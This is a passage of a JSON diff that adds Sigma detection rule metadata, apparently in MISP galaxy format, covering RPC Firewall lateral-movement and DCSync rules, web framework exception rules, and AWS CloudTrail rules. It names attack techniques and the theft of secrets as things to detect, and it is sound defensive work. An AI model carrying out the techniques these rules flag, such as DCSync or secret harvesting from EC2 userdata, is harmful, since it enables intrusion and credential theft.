"logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + 
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", + "value": "Remote Schedule Task Lateral Movement via ATSvc" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_atsvc_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", + "value": "Remote Schedule Task Recon via AtScv" + }, + { + "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_dcsync_attack.yml", + "level": "high", + 
"logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1033/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" + ], + "tags": [ + "attack.t1033" + ] + }, + "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", + "value": "Possible DCSync Attack" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Legitimate usage of remote file encryption" + ], + "filename": "rpc_firewall_efs_abuse.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", + "value": "Remote Encrypting File System Abuse" + }, + { + "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + 
"falsepositive": [ + "Remote administrative tasks on Windows Events" + ], + "filename": "rpc_firewall_eventlog_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", + "value": "Remote Event Log Recon" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", + "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks", + "meta": { + "author": "Sagie Dulce, Dekel 
Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_itaskschedulerservice_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", + "value": "Remote Schedule Task Recon via ITaskSchedulerService" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Actual printing" + ], + "filename": "rpc_firewall_printing_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", + "value": "Remote Printing Abuse for Lateral Movement" + }, + { + "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Some administrative tasks on remote host" + ], + "filename": "rpc_firewall_remote_dcom_or_wmi.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://attack.mitre.org/techniques/T1021/003/", + "https://attack.mitre.org/techniques/T1047/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003", + "attack.t1047" + ] + }, + "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", + "value": "Remote DCOM/WMI Lateral Movement" + }, + { + "description": "Detects remote RPC calls to modify the registry and possible execute code", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administration of registry values" + ], + "filename": "rpc_firewall_remote_registry_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1112/", + "https://attack.mitre.org/tactics/TA0008/", + 
"https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", + "value": "Remote Registry Lateral Movement" + }, + { + "description": "Detects remote RPC calls to collect information", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Remote administration of registry values" + ], + "filename": "rpc_firewall_remote_registry_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", + "value": "Remote Registry Recon" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Legitimate remote share creation" + ], + "filename": 
"rpc_firewall_remote_server_service_abuse.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", + "value": "Remote Server Service Abuse" + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Administrative tasks on remote services" + ], + "filename": "rpc_firewall_remote_service_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://attack.mitre.org/techniques/T1569/002/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1569.002" + ] + }, + "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", + 
"value": "Remote Server Service Abuse for Lateral Movement" + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sasec_lateral_movement.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ] + }, + "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", + "value": "Remote Schedule Task Lateral Movement via SASec" + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sasec_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + 
"https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", + "value": "Recon Activity via SASec" + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sharphound_recon_account.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1087/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" + ], + "tags": [ + "attack.t1087" + ] + }, + "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", + "value": "SharpHound Recon Account Discovery" + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "meta": { + "author": "Sagie Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_sharphound_recon_sessions.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://attack.mitre.org/techniques/T1033/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", + 
"https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" + ], + "tags": [ + "attack.t1033" + ] + }, + "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", + "value": "SharpHound Recon Sessions" + }, + { + "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/08/06", + "falsepositive": [ + "Application bugs" + ], + "filename": "appframework_ruby_on_rails_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "ruby_on_rails", + "refs": [ + "http://edgeguides.rubyonrails.org/security.html", + "http://guides.rubyonrails.org/action_controller_overview.html", + "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", + "value": "Ruby on Rails Framework Exceptions" + }, + { + "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/08/06", + "falsepositive": [ + "Application bugs" + ], + "filename": "appframework_spring_exceptions.yml", + "level": "medium", + "logsource.category": "application", + "logsource.product": "spring", + "refs": [ + 
"https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/appframework_spring_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", + "value": "Spring Framework Exceptions" + }, + { + "description": "Detects SQL error messages that indicate probing for an injection attack", + "meta": { + "author": "Bjoern Kimminich", + "creation_date": "2017/11/27", + "falsepositive": [ + "Application bugs" + ], + "filename": "app_sqlinjection_errors.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "sql", + "refs": [ + "http://www.sqlinjection.net/errors", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", + "value": "Suspicious SQL Error Messages" + }, + { + "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/23", + "falsepositive": [ + "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "aws_attached_malicious_lambda_layer.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", + "value": "AWS Attached Malicious Lambda Layer" + }, + { + "description": "Detects disabling, deleting and updating of a Trail", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "Valid change in a Trail" + ], + "filename": "aws_cloudtrail_disable_logging.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_cloudtrail_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", + "value": "AWS CloudTrail Important Change" + }, + { + "description": "Detects AWS Config Service disabling", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "Valid change in AWS Config Service" + ], + "filename": "aws_config_disable_recording.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_config_disable_recording.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "07330162-dba1-4746-8121-a9647d49d297", + "value": "AWS Config Disabling Channel/Recorder" + }, + { + "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) 
encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/29", + "falsepositive": [ + "System Administrator Activities", + "DEV, UAT, SAT environment. You should apply this rule with PROD account only." + ], + "filename": "aws_ec2_disable_encryption.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_disable_encryption.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486", + "attack.t1565" + ] + }, + "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", + "value": "AWS EC2 Disable EBS Encryption" + }, + { + "description": "Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/11", + "falsepositive": [ + "Assets management software like device42" + ], + "filename": "aws_ec2_download_userdata.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_download_userdata.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c", + "value": "AWS EC2 Download Userdata" + }, + { + "description": "Detects changes to the EC2 instance startup script. 
The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Valid changes to the startup script" + ], + "filename": "aws_ec2_startup_script_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_startup_script_change.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.004" + ] + }, + "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", + "value": "AWS EC2 Startup Shell Script Change" + }, + { + "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", + "meta": { + "author": "Diogo Braz", + "creation_date": "2020/04/16", + "falsepositive": "No established falsepositives", + "filename": "aws_ec2_vm_export_failure.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_vm_export_failure.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005", + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", + "value": "AWS EC2 VM Export Failure" + }, + { + "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a 
lab environment.\n", + "meta": { + "author": "Darin Smith", + "creation_date": "2022/06/07", + "falsepositive": [ + "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons" + ], + "filename": "aws_ecs_task_definition_backdoor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", + "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", + "https://attack.mitre.org/techniques/T1525", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1525" + ] + }, + "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", + "value": "AWS ECS Backdoor Task Definition" + }, + { + "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_efs_fileshare_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", + "value": "AWS EFS Fileshare Modified or Deleted" + }, + { + "description": "Detects when a EFS Fileshare Mount is modified or deleted. 
An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", + "value": "AWS EFS Fileshare Mount Modified or Deleted" + }, + { + "description": "Identifies when an EKS cluster is created or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "EKS Cluster being created or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
